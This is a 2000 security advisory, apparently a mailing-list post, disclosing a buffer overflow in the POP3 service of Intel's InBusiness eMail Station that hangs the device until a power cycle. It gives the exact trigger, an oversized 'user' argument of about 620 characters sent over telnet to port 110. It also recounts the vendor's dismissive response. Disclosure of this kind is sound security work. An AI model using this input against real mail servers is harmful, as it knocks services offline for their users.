Intel corporation 'InBusiness eMail Station' firmware version 1.04.87

(latest) Denial of service vulnerability.



Vendor notification date: 20/10-2000

Public notification date: 20/10-2000



Problem: I found a buffer overflow in the Intel InBusiness eMail Station,

which

can enable an attacker to execute a denial of service attack against it.



Disclaimer: For educational purposes only.



example :

[foo@bar]$ telnet mailstation 110

Trying mailstation...

Connected to mailstation.

Escape character is '^]'.

+OK Pop server at mailstation starting. <2831812.972049732@mail>

user [buffer]



where [buffer] is appx. 620 chars of your own choice.(tried A and %, expect

all to work)



Symptoms: The box(a nice little piece of hardware with built-in harddrive

and all) will stop responding, and needs a power cycle to restore function.



Reason for posting same date as vendor notification:  Intel was contacted

and informed of the bug, and all they had to say was "You're using it in a

way its not supposed to be used" (i told them it was on a leased line) - in

their opinion it doesn't matter since its possible to connect a modem to it,

and use it for retrieving mail and distributing it locally.





Sincerely (and a big thanks to Intel for not caring about product security

at all)



Knud Erik Højgaard